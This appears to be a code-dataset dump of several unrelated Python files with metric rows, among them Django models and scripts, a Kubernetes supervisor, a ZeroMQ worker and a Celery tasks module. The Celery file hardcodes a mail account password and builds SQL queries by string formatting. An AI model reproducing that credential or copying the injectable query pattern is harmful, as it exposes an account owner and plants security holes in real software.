| 24.045455 | 114 | 0.586011 | 54 | 529 | 5.648148 | 0.740741 | 0.091803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050398 | 0.287335 | 529 | 21 | 115 | 25.190476 | 0.758621 | 0.085066 | 0 | 0 | 1 | 0 | 0.076763 | 0.047718 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af6d4a7039b51cca97e0de8ab8ff4d922402d030 | 1,219 | py | Python | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | 80 | 2017-11-13T21:58:55.000Z | 2022-01-03T20:10:42.000Z | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | null | null | null | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | 21 | 2017-11-14T09:47:41.000Z | 2021-11-23T06:44:31.000Z | import random
from task_widgets.task_base.intro_hint import IntroHint
from utils import import_kv
from .calculation import ModeOperandsCalculation

# Load the kv layout file that accompanies this module.
import_kv(__file__)
class IntroHintNumbersCalculation(IntroHint):
    # Empty specialization of IntroHint for this task type; presumably the kv
    # file loaded via import_kv(__file__) targets this class name -- confirm.
    pass
class NumbersCalculation(ModeOperandsCalculation):
    """Addition task over three-digit numbers.

    Depending on ``mode``, one of the three values in ``first + second =
    result`` is hidden and becomes the expected answer.
    """

    FROM = 101
    TO = 899
    TASK_KEY = "numbers_calculation"
    INTRO_HINT_CLASS = IntroHintNumbersCalculation

    def calculate_operands(self):
        # Keep operands that were preset; generate the rest randomly so that
        # first + second == result always holds and the result exceeds the
        # first operand by at least 100.
        if not self.first:
            self.first = random.randint(self.FROM, self.TO - 100)
        if not self.result:
            self.result = random.randint(self.first + 100, self.TO)
        if not self.second:
            self.second = self.result - self.first

    def build_text(self):
        # Hide a different term of the equation depending on the mode.
        if self.mode == 0:
            self.correct_answer = self.result
            return "%s + %s = ?" % (self.first, self.second)
        if self.mode == 1:
            self.correct_answer = self.first
            return "? + %s = %s" % (self.second, self.result)
        if self.mode == 2:
            self.correct_answer = self.second
            return "%s + ? = %s" % (self.first, self.result)
        return None

    def get_next_variant(self):
        # Wrong-answer candidates are the correct answer shifted by a
        # random multiple of ten (possibly zero).
        step = random.randint(-10, +10)
        return self.correct_answer + 10 * step
| 28.348837 | 78 | 0.641509 | 149 | 1,219 | 5.107383 | 0.328859 | 0.082786 | 0.089356 | 0.082786 | 0.049934 | 0.049934 | 0 | 0 | 0 | 0 | 0 | 0.023153 | 0.255948 | 1,219 | 42 | 79 | 29.02381 | 0.815877 | 0 | 0 | 0 | 0 | 0 | 0.042658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.033333 | 0.166667 | 0.033333 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
af88d8896fe80a9f9654ff4b2d47da0592903018 | 4,026 | py | Python | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 294 | 2020-08-24T19:49:09.000Z | 2022-03-28T02:42:13.000Z | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 79 | 2020-09-01T00:44:25.000Z | 2022-03-23T07:52:22.000Z | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 41 | 2020-08-25T17:02:08.000Z | 2022-02-27T21:39:48.000Z | # Copyright 2020 Petuum, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kubernetes_asyncio as kubernetes
from aiohttp import web
import logging
from adaptdl.sched_hints import SCHED_HINTS
from adaptdl_sched.config import get_supervisor_port
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
class Supervisor:
    """
    Supervisor provides a simple REST interface for several functionalities.
    Currently, it has two endpoints:
    1. /hints for jobs to send scheduling hints.
    2. /discover for finding the pod IPs of a job.
    (/healthz additionally serves as a liveness probe.)
    """

    def __init__(self, port, host='0.0.0.0'):
        self._host = host
        self._port = port
        # Core API for pods; custom-objects API for AdaptDLJob resources.
        self._core_api = kubernetes.client.CoreV1Api()
        self._objs_api = kubernetes.client.CustomObjectsApi()

    async def _handle_healthz(self, request):
        # Health check.
        return web.Response()

    async def _handle_discover(self, request):
        # Long-polling endpoint used for discovering pod IPs for a given job.
        namespace = request.match_info["namespace"]
        name = request.match_info["name"]
        group = request.match_info["group"]
        # How long (seconds) to keep the watch open before giving up.
        timeout = int(request.query.get("timeout", "30"))
        pod_ip_list = None
        async with kubernetes.watch.Watch() as w:
            # Watch only this job's pods which already have an IP assigned.
            stream = w.stream(self._core_api.list_namespaced_pod, namespace,
                              label_selector="adaptdl/job={}".format(name),
                              field_selector="status.podIP!=",
                              timeout_seconds=timeout)
            async for event in stream:
                pod = event["object"]
                replicas = int(pod.metadata.annotations["adaptdl/replicas"])
                rank = int(pod.metadata.annotations["adaptdl/rank"])
                if pod.metadata.annotations["adaptdl/group"] == group:
                    if pod_ip_list is None:
                        # Lazily size the result from the first matching pod.
                        pod_ip_list = [None] * replicas
                    pod_ip_list[rank] = pod.status.pod_ip
                    if all(pod_ip is not None for pod_ip in pod_ip_list):
                        # Every rank has reported an IP: respond immediately.
                        return web.json_response(pod_ip_list)
        return web.json_response(status=408)  # Timeout.

    async def _handle_report(self, request):
        namespace = request.match_info['namespace']
        name = request.match_info['name']
        hints = await request.json()
        # Drop all unrecognized fields. TODO: validate each client-sent field.
        hints = {k: hints[k] for k in SCHED_HINTS if k in hints}
        # Patch only the train field to avoid conflicts with controller.
        patch = {"status": {"train": hints}}
        LOG.info("Patch AdaptDLJob %s/%s: %s", namespace, name, patch)
        await self._objs_api.patch_namespaced_custom_object_status(
            "adaptdl.petuum.com", "v1", namespace, "adaptdljobs", name, patch)
        return web.Response()

    def run(self):
        # Builds the aiohttp app and blocks serving requests until stopped.
        self.app = web.Application()
        self.app.add_routes([
            web.get('/healthz', self._handle_healthz),
            web.get('/discover/{namespace}/{name}/{group}',
                    self._handle_discover),
            web.put('/hints/{namespace}/{name}', self._handle_report),
        ])
        LOG.info("%s %s", self._host, self._port)
        web.run_app(self.app, host=self._host, port=self._port)
if __name__ == "__main__":
    logging.basicConfig()
    # Load credentials from the pod's service account (in-cluster config).
    kubernetes.config.load_incluster_config()
    supervisor = Supervisor(get_supervisor_port())
    supervisor.run()
| 40.26 | 78 | 0.642077 | 506 | 4,026 | 4.938735 | 0.379447 | 0.018007 | 0.021609 | 0.034814 | 0.096038 | 0.070428 | 0.070428 | 0.046419 | 0.046419 | 0.046419 | 0 | 0.007026 | 0.257576 | 4,026 | 99 | 79 | 40.666667 | 0.82904 | 0.247144 | 0 | 0.032258 | 0 | 0 | 0.091092 | 0.020429 | 0 | 0 | 0 | 0.010101 | 0 | 1 | 0.032258 | false | 0 | 0.080645 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af8bfbc4d47aab875b9630049b677aba7e677060 | 703 | py | Python | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | import django
import os
import sys

# Make the project importable and boot Django before touching any models.
sys.path.append("/home/ubuntu/edtech-backend")
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'superteacher.settings')
django.setup()

# Model imports must come after django.setup(), otherwise the app registry
# is not populated yet.
from exams.models import Exam
from subjects.models import Subject
from chapters.models import Chapter
from questions.models import QuestionChapterMapping
if __name__ == '__main__':
    # The exam code to process is the first command-line argument.
    target_exam = Exam.objects.get(exam_code=sys.argv[1])
    for subj in Subject.objects.filter(exam=target_exam):
        for chap in Chapter.objects.filter(subject=subj):
            # Recompute the cached per-chapter question count.
            chap.question_count = QuestionChapterMapping.objects.filter(chapter=chap).count()
            chap.save()
| 30.565217 | 99 | 0.751067 | 86 | 703 | 6 | 0.465116 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001678 | 0.152205 | 703 | 22 | 100 | 31.954545 | 0.864094 | 0 | 0 | 0 | 0 | 0 | 0.110953 | 0.099573 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.388889 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af8c318c25e681dcaae6ae6cba4be68036fd789b | 1,599 | py | Python | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | #!/usr/bin/python3
'''TODO: doc
'''
import argparse, os, sys
import view
import kcore.common as C
import kcore.webserver as W
# Routing table: URL patterns mapped to their view callables.  Patterns look
# regex-like ('/$', trailing '.*') -- presumably matched by kcore.webserver;
# confirm its matching semantics before editing.
WEB_HANDLERS = {
    '/$': view.root_view,
    '/easy': view.easy_view,
    '/healthz': view.healthz_view,
    '/static.*': view.static_view,
    '/status': view.status_view,
    '/statusz': view.statusz_view,
    '/touchz': view.touchz_view,
    '/trigger.*': view.trigger_view,
}
# ---------- main
def parse_args(argv):
    """Build the command-line parser and apply it to *argv*."""
    parser = argparse.ArgumentParser(description='home automation web server')
    parser.add_argument(
        '--debug', '-d', action='store_true',
        help='debug mode; log to stdout, disable all external comm')
    parser.add_argument(
        '--logfile', '-l', default='homesec.log',
        help='filename for operations log. "-" for stdout, blank to disable log file')
    parser.add_argument(
        '--port', '-p', type=int, default=8080,
        help='port to listen on')
    parser.add_argument(
        '--syslog', '-s', action='store_true',
        help='sent alert level log messages to syslog')
    return parser.parse_args(argv)
def main(argv=None):
    """Parse arguments, configure logging, and serve WEB_HANDLERS forever.

    Fix: the previous signature used a mutable default argument
    (``argv=[]``).  ``None`` has the same falsy semantics here (either way
    ``sys.argv[1:]`` is used when no argv is given), so callers are
    unaffected, but the shared-mutable-default pitfall is gone.
    """
    args = parse_args(argv or sys.argv[1:])
    # '-' routes the log to stdout in debug mode.
    C.init_log('homesec', '-' if args.debug else args.logfile,
               filter_level_logfile=C.DEBUG if args.debug else C.INFO,
               filter_level_syslog=C.CRITICAL if args.syslog else C.NEVER)
    if args.debug:
        import ext
        ext.DEBUG = True
        view.DEBUG = True
        C.log_warning('** DEBUG MODE ACTIVATED **')
    ws = W.WebServer(WEB_HANDLERS, wrap_handlers=not args.debug)
    ws.start(port=args.port, background=False)  # Doesn't return.
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
| 30.169811 | 139 | 0.657286 | 226 | 1,599 | 4.5 | 0.433628 | 0.019666 | 0.051131 | 0.037365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004591 | 0.182614 | 1,599 | 52 | 140 | 30.75 | 0.773527 | 0.036898 | 0 | 0 | 0 | 0 | 0.242978 | 0 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0.057143 | false | 0 | 0.142857 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af91a12ebe5083f2cf235e0116338c74e0aeaed6 | 377 | py | Python | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | null | null | null | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | 9 | 2019-04-01T21:52:12.000Z | 2019-06-11T17:31:10.000Z | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | 2 | 2019-03-31T16:23:04.000Z | 2019-06-15T22:14:41.000Z | """module for custom template tags"""
from django import template
register = template.Library()
@register.simple_tag
def get_color_tag(counter):
    """Return 'warning' for an even counter and 'info' for an odd one."""
    return 'warning' if counter % 2 == 0 else 'info'
@register.simple_tag
def get_danger_tag():
    """Return the constant color tag 'danger'."""
    return 'danger'
| 19.842105 | 58 | 0.681698 | 50 | 377 | 5.02 | 0.58 | 0.095618 | 0.135458 | 0.159363 | 0.183267 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0.201592 | 377 | 18 | 59 | 20.944444 | 0.827243 | 0.28382 | 0 | 0.2 | 0 | 0 | 0.066929 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
af997d86b84297ca9d63b60be310ee0b4083bbef | 241 | py | Python | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | n = 0
from math import gcd


def smallest_multiple(limit=20):
    """Return the smallest positive integer evenly divisible by 1..limit.

    Replaces the original brute-force search (stepping by `factor` and
    trial-dividing every candidate) with the LCM identity
    lcm(a, b) = a * b // gcd(a, b), which needs only O(limit) arithmetic
    operations and also generalizes the hard-coded 20 into a parameter.
    """
    result = 1
    for factor in range(2, limit + 1):
        result = result * factor // gcd(result, factor)
    return result


# Project Euler problem 5: prints the same value (232792560 for 1..20) as
# the original loop did.
print(smallest_multiple(20))
| 17.214286 | 42 | 0.473029 | 33 | 241 | 3.363636 | 0.515152 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044444 | 0.439834 | 241 | 13 | 43 | 18.538462 | 0.777778 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afa4bdb48572500308077fd97c941de2d87fc5a4 | 443 | py | Python | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.timezone import now
class Event(models.Model):
    """A timestamped, described event optionally linked to a baby."""

    # Defaults to the time the record is created.
    datetime = models.DateTimeField(default=now)
    description = models.CharField(max_length=200, null=False)
    # SET_NULL keeps the event row when the referenced baby is deleted.
    baby = models.ForeignKey(
        'babies.Baby',
        on_delete=models.SET_NULL,
        null=True,
        blank=False,
    )

    def __str__(self):
        # Fix: the old message ended with a stray unmatched ')' and had no
        # space after 'date:'.
        return f"Event's Baby: {self.baby}, date: {self.datetime}"
afa519ef4f83aa049def19f381594b951d04f274 | 921 | py | Python | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | 1 | 2020-06-08T00:02:19.000Z | 2020-06-08T00:02:19.000Z | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | null | null | null | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | null | null | null | import ast
import json
import os
import signal
import sys

import zmq

from tasks import *

# PULL socket bound locally: receives task messages (presumably pushed by a
# dispatcher process -- confirm against the sender side).
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.bind('tcp://127.0.0.1:5588')

# Socket to send messages to (PUSH): reports task status updates downstream.
sender = context.socket(zmq.PUSH)
sender.connect("tcp://127.0.0.1:5589")
# todo: clean kill - wait until all in-flight work finishes before exiting
def signal_handler(signum, frame):
    """Terminate the worker on the first signal received.

    Further deliveries of the same signal are ignored so shutdown is not
    interrupted.
    """
    signal.signal(signum, signal.SIG_IGN)  # ignore additional signals
    sys.exit(0)
if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    while True:
        # Wire format: five space-separated byte fields --
        #   queue task_id func_name comma_separated_args python_literal_kwargs
        msg = receiver.recv()
        queue, tid, func, arg, kwarg = msg.split(b' ', maxsplit=4)
        # NOTE(review): args always arrive as strings, and an empty args
        # field still yields ('',) -- confirm callers never send zero args.
        arg= tuple(arg.decode().split(','))
        kwargs= ast.literal_eval(kwarg.decode())
        sender.send(tid+ b' 1') # status running
        # Dispatch to the named attribute on Tasks (star-imported from tasks).
        result = getattr(Tasks, func.decode())(*arg, **kwargs)
        # NOTE(review): `result` is computed but never sent back -- verify
        # whether the consumer expects it or status "2" alone suffices.
        sender.send(tid + b' 2') # status completed
| 26.314286 | 69 | 0.67101 | 131 | 921 | 4.625954 | 0.557252 | 0.059406 | 0.052805 | 0.026403 | 0.029703 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032129 | 0.188925 | 921 | 34 | 70 | 27.088235 | 0.779116 | 0.152009 | 0 | 0 | 0 | 0 | 0.069677 | 0 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afaecf270b0012749d2bfc7693fa3750c22d2cee | 393 | py | Python | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | 8 | 2020-08-27T17:16:59.000Z | 2022-02-02T13:39:41.000Z | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | 3 | 2022-02-09T19:18:12.000Z | 2022-03-08T21:12:00.000Z | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import aioros
from rospy_tutorials.srv import AddTwoInts
from rospy_tutorials.srv import AddTwoIntsResponse
async def setup(nh: aioros.NodeHandle):
await nh.create_service(
'add_two_ints',
AddTwoInts,
lambda request: AddTwoIntsResponse(request.a + request.b))
if __name__ == '__main__':
aioros.run_forever(setup, 'add_two_ints_server')
| 21.833333 | 66 | 0.735369 | 49 | 393 | 5.55102 | 0.653061 | 0.066176 | 0.132353 | 0.154412 | 0.198529 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003077 | 0.173028 | 393 | 17 | 67 | 23.117647 | 0.833846 | 0.043257 | 0 | 0 | 0 | 0 | 0.104 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afaf8c33f53139fdc1d77c79ac987609220c6432 | 2,150 | py | Python | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | #
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2016
#
import unittest, sys
import ibm_db
import config
from testfunctions import IbmDbTestFunctions
class Wrapper(str):
def __del__(self):
print("Wrapper(" + self + ") being deleted")
class IbmDbTestCase(unittest.TestCase):
def test_312_CacheBoundParameters(self):
obj = IbmDbTestFunctions()
obj.assert_expect(self.run_test_312)
def run_test_312(self):
conn = ibm_db.connect(config.database, config.user, config.password)
ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
query = "INSERT INTO department (deptno, deptname, mgrno, admrdept, location) VALUES (?, ?, ?, ?, ?)"
if conn:
stmt = ibm_db.prepare(conn, query)
params = ['STG', 'Systems & Technology', '123456', 'RSF', 'Fiji']
print("Binding parameters")
for i,p in enumerate(params, 1):
ibm_db.bind_param(stmt, i, Wrapper(p))
if ibm_db.execute(stmt):
print("Executing statement")
ibm_db.execute(stmt)
# force the cache to be unbound
for i,p in enumerate(params, 1):
ibm_db.bind_param(stmt, i, p)
ibm_db.rollback(conn)
else:
print("Connection failed.")
#__END__
#__LUW_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__ZOS_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__SYSTEMI_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__IDS_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
| 25.903614 | 105 | 0.716279 | 267 | 2,150 | 5.58427 | 0.344569 | 0.169014 | 0.20389 | 0.091214 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0 | 0.025496 | 0.17907 | 2,150 | 82 | 106 | 26.219512 | 0.819263 | 0.429302 | 0 | 0.068966 | 0 | 0 | 0.17285 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.103448 | false | 0.034483 | 0.137931 | 0 | 0.310345 | 0.137931 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afb70e64470f695604ab08c23db3df1fce35c61f | 4,176 | py | Python | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | # Developed by Mark Barrett
# http://markbarrettdesign.com
# https://github.com/mark-barrett
from __future__ import absolute_import, unicode_literals
import os
import django
from celery import Celery
from django.core.mail import get_connection, send_mail
from django.template import loader
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'RESTBroker.settings')
django.setup()
app = Celery('tasks', broker='pyamqp://guest@localhost//', backend='rpc://guest@localhost//',)
from sshtunnel import SSHTunnelForwarder
from django.http import HttpResponse
from datetime import datetime
import MySQLdb as db
import dicttoxml
import base64
import redis
import json
from core.models import *
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
@app.task(name='send_email')
def send_email(to, subject, body):
# Establish a connection
connection = get_connection(
host='mail.privateemail.com',
port=587,
username='hi@lapis.works',
password='yE1UpesF',
use_tls=True
)
# Open the template and pass the body into it
email_obj = loader.render_to_string('email/main.html', {'body': body})
# Send it
send_mail(subject,
subject,
'hi@lapis.works',
[to],
fail_silently=True,
html_message=email_obj,
connection=connection)
# Close the connection
connection.close()
@app.task(name='build_database')
def build_database(project_id, server_address,
database_name, database_user, database_password):
# Try connect to the database by its name to check if it exists.
try:
conn = db.connect(host=server_address, port=3306,
user=database_user, password=database_password,
database=database_name)
# If all good close the connection
conn.close()
# Now try to actually build the database
try:
conn = db.connect(host=server_address, port=3306,
user=database_user, password=database_password,
database='information_schema')
project = Project.objects.get(id=project_id)
# Now that we know we can connect, let's construct a database object
database = Database(
server_address=server_address,
name=database_name,
user=database_user,
password=database_password,
project=project
)
print("Hello World")
database.save()
cursor = conn.cursor()
cursor2 = conn.cursor()
# Get all of the tables in that database
cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema='%s'" % database_name)
for row in cursor:
database_table = DatabaseTable(
name=row[2],
database=database
)
database_table.save()
query = "SELECT * FROM information_schema.columns WHERE table_name='{0}' AND table_schema='{1}'".format(
row[2], database_name)
# For each row, get the columns in that table
cursor2.execute(query)
for inner_row in cursor2:
database_column = DatabaseColumn(
name=inner_row[3],
type=inner_row[7],
table=database_table
)
database_column.save()
# Set the "database built" in the project ot true.
project.database_built = True
project.save()
# Close all the stuff
cursor.close()
cursor2.close()
conn.close()
return 'Built Database'
except Exception as e:
return str(e)
except Exception as e:
return str(e) | 28.60274 | 120 | 0.587644 | 462 | 4,176 | 5.160173 | 0.359307 | 0.027265 | 0.021812 | 0.030201 | 0.114933 | 0.114933 | 0.098154 | 0.074664 | 0.074664 | 0.074664 | 0 | 0.008945 | 0.330699 | 4,176 | 146 | 121 | 28.60274 | 0.844007 | 0.128352 | 0 | 0.12766 | 0 | 0 | 0.115586 | 0.039448 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031915 | false | 0.053191 | 0.159574 | 0 | 0.234043 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
